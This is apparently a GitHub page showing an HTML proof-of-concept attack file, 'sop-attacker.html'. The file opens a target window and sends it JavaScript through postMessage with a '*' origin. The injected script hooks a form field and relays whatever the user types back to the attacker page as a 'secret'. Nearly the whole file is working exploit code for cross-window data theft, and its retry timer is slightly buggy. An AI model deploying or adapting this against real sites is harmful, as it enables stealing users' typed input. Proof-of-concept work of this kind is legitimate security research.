-
Notifications
You must be signed in to change notification settings - Fork 0
/
sop-attacker.html
43 lines (34 loc) · 1.34 KB
/
sop-attacker.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<html>
<head>
<meta charset="utf-8">
</head>
<body>
POC based on https://isitsafe.co.uk/SecurityHeaders/halifax/
<div>
<p>Secret: <span id="secret"></span></p>
</div>
<script type="text/javascript">
function openTarget() {
openedWindow=window.open("sop-target.html","sopttarget");
intercept();
return false;
}
openTarget();
window.addEventListener('message',function(event) {
var eventData=event.data;
var retryTimer=null;
if (eventData.response=='valid') {
clearTimeout(retryTimer);
}
if (eventData.secretChange) {
document.getElementById('secret').innerText=eventData.secretChange;
}
});
function intercept() {
openedWindow.postMessage("window.parentPost=function(name,val) { try { var obj={};obj[name]=val;window.opener.postMessage(obj,'*'); } catch (e) { console.log(e); } }","*");
openedWindow.postMessage("document.forms[0].elements['text'].addEventListener('change',function() {parentPost('secretChange',this.value);})","*");
retryTimer=setTimeout(intercept,500);
}
</script>
</body>
</html>